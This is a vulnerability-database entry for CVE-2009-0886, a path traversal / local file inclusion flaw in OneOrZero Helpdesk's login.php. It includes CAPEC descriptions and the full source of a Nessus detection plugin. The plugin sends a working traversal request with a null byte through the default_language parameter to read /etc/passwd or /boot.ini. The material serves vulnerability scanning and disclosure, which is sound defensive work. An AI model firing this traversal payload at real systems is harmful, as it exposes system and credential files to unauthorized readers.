Vulnerabilities > CVE-2009-0886 - Path Traversal vulnerability in Oneorzero Helpdesk

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
low complexity
oneorzero
CWE-22
nessus
exploit available

Summary

Directory traversal vulnerability in login.php in OneOrZero Helpdesk 1.6.5.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the default_language parameter.

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Relative Path Traversal
    An attacker exploits a weakness in input validation on the target by supplying a specially constructed path utilizing dot and slash characters for the purpose of obtaining access to arbitrary files or resources. An attacker modifies a known path on the target in order to reach material that is not available through intended channels. These attacks normally involve adding additional path separators (/ or \) and/or dots (.), or encodings thereof, in various combinations in order to reach parent directories or entirely separate trees of the target's directory structure.
  • Directory Traversal
    An attacker with access to file system resources, either directly or via application logic, will use various file path specification or navigation mechanisms such as ".." in path strings and absolute paths to extend their range of access to inappropriate areas of the file system. The attacker attempts to either explore the file system for recon purposes or access directories and files that are intended to be restricted from their access. Exploring the file system can be achieved through constructing paths presented to directory listing programs, such as "ls" and 'dir', or through specially crafted programs that attempt to explore the file system. The attacker engaging in this type of activity is searching for information that can be used later in a more exploitive attack. Access to restricted directories or files can be achieved through modification of path references utilized by system applications.
  • File System Function Injection, Content Based
    An attack of this type exploits the host's trust in executing remote content including binary files. The files are poisoned with a malicious payload (targeting the file systems accessible by the target software) by the attacker and may be passed through standard channels such as via email, and standard web content like PDF and multimedia files. The attacker exploits known vulnerabilities or handling routines in the target processes. Vulnerabilities of this type have been found in a wide variety of commercial applications from Microsoft Office to Adobe Acrobat and Apple Safari web browser. When the attacker knows the standard handling routines and can identify vulnerabilities and entry points they can be exploited by otherwise seemingly normal content. Once the attack is executed, the attackers' program can access relative directories such as C:\Program Files or other standard system directories to launch further attacks. In a worst case scenario, these programs are combined with other propagation logic and work as a virus.
  • Using Slashes and URL Encoding Combined to Bypass Validation Logic
    This attack targets the encoding of the URL combined with the encoding of the slash characters. An attacker can take advantage of the multiple way of encoding an URL and abuse the interpretation of the URL. An URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc.
  • Manipulating Input to File System Calls
    An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.

Exploit-Db

  • descriptionOneOrZero Helpdesk <= 1.6.5.7 Local File Inclusion Vulnerability. CVE-2009-0886. Webapps exploit for php platform
    fileexploits/php/webapps/8168.txt
    idEDB-ID:8168
    last seen2016-02-01
    modified2009-03-06
    platformphp
    port
    published2009-03-06
    reporterdun
    sourcehttps://www.exploit-db.com/download/8168/
    titleOneOrZero Helpdesk <= 1.6.5.7 - Local File Inclusion Vulnerability
    typewebapps
  • idEDB-ID:8169

Nessus

NASL familyCGI abuses
NASL idONEORZERO_DEFAULT_LANGUAGE_LFI.NASL
descriptionThe remote host is running OneOrZero Helpdesk, a web-based helpdesk application written in PHP. The version of OneOrZero Helpdesk installed on the remote host fails to filter input to the
last seen2020-06-01
modified2020-06-02
plugin id35805
published2009-03-09
reporterThis script is Copyright (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
sourcehttps://www.tenable.com/plugins/nessus/35805
titleOneOrZero Helpdesk default_language Local File Inclusion
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");


if (description)
{
  script_id(35805);
  script_version("1.14");

  script_cve_id("CVE-2009-0886");
  script_bugtraq_id(34029);
  script_xref(name:"EDB-ID", value:"8168");

  script_name(english:"OneOrZero Helpdesk default_language Local File Inclusion");
  script_summary(english:"Tries to read a local file");

  script_set_attribute( attribute:"synopsis",  value:
"The remote web server contains a PHP script that is affected by a
local file include vulnerability."  );
  script_set_attribute(  attribute:"description",  value:
"The remote host is running OneOrZero Helpdesk, a web-based helpdesk
application written in PHP.

The version of OneOrZero Helpdesk installed on the remote host fails
to filter input to the 'default_language' variable in the
'common/login.php' script before using it to include PHP code.
Provided PHP's 'register_globals' setting is enabled, an
unauthenticated attacker can exploit this issue to view arbitrary
files or possibly to execute arbitrary PHP code on the remote host,
subject to the privileges of the web server user id."  );
  script_set_attribute(
    attribute:"solution", 
    value:"Unknown at this time."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
 script_cwe_id(22);
 script_set_attribute(attribute:"plugin_publication_date", value: "2009/03/09");
 script_cvs_date("Date: 2018/07/16 14:09:12");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("http_version.nasl", "os_fingerprint.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/PHP");
  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");

port = get_http_port(default:80, php: 1);

# Try to retrieve a local file.
os = get_kb_item("Host/OS");
if (os)
{
  if ("Windows" >< os) file = '/boot.ini';
  else file = '/etc/passwd';
  files = make_list(file);
}
else files = make_list('/etc/passwd', '/boot.ini');
file_pats = make_array();
file_pats['/etc/passwd'] = "root:.*:0:[01]:";
file_pats['/boot.ini'] = "^ *\[boot loader\]";


# Loop through directories.
if (thorough_tests) dirs = list_uniq(make_list("/ooz", "/oneorzero", "/helpdesk", "/help", cgi_dirs()));
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Make sure it's OneOrZero Helpdesk.
  res = http_get_cache(item:string(dir, "/index.php"), port:port, exit_on_fail: 1);

  if ("OneOrZero" >< res)
  {
    # Loop through files to look for.
    foreach file (files)
    {
      if (file[0] == '/') traversal = crap(data:"../", length:3*9) + '..';
      else traversal = '../../../';

      url = string(
        dir, "/common/login.php?",
        "default_language=", string(traversal, file, "%00")
      );

      # Try to exploit the issue.
      res = http_send_recv3(port:port, method:"GET", item:url, exit_on_fail: 1);

      # There's a problem if...
      body = res[2];
      file_pat = file_pats[file];
      if (
        # we see the expected contents or...
        egrep(pattern:file_pat, string:body) ||
        # we get an error because magic_quotes was enabled or...
        string(file, "\\0.lang.php") >< body ||
        # we get an error claiming the file doesn't exist or...
        string(file, "): failed to open stream: No such file") >< body ||
        string(file, ") [function.include]: failed to open stream: No such file") >< body ||
        string(file, ") [<a href='function.include'>function.include</a>]: failed to open stream: No such file") >< body ||
        # we get an error about open_basedir restriction.
        string(file, ") [function.include]: failed to open stream: Operation not permitted") >< body ||
        string(file, ") [<a href='function.include'>function.include</a>]: failed to open stream: Operation not permitted") >< body ||
        string("open_basedir restriction in effect. File(", file) >< body
      )
      {
        if (report_verbosity > 0)
        {
          if (egrep(pattern:file_pat, string:body))
          {
            if (os && "Windows" >< os) file = str_replace(find:'/', replace:'\\', string:file);

            report = string(
              "\n",
              "Nessus was able to exploit the issue to retrieve the contents of\n",
              "'", file, "' on the remote host using the following URL :\n",
              "\n",
              "  ", build_url(port:port, qs:url), "\n"
            );
            if (report_verbosity > 1)
            {
             contents = body;
             if ("<br />" >< contents) contents = contents - strstr(contents, "<br />");
             contents = data_protection::redact_etc_passwd(output:contents);
             report += string(
                "\n",
                "Here are its contents :\n",
                "\n",
                crap(data:"-", length:30), " snip ", crap(data:"-", length:30), "\n",
                contents,
                crap(data:"-", length:30), " snip ", crap(data:"-", length:30), "\n"
              );
            }
          }
          else
          {
            report = string(
              "\n",
              "Nessus was able to verify the issue exists using the following \n",
              "URL :\n",
              "\n",
              "  ", build_url(port:port, qs:url), "\n"
            );
          }
          security_warning(port:port, extra:report);
        }
        else security_warning(port);

        exit(0);
      }
    }
  }
}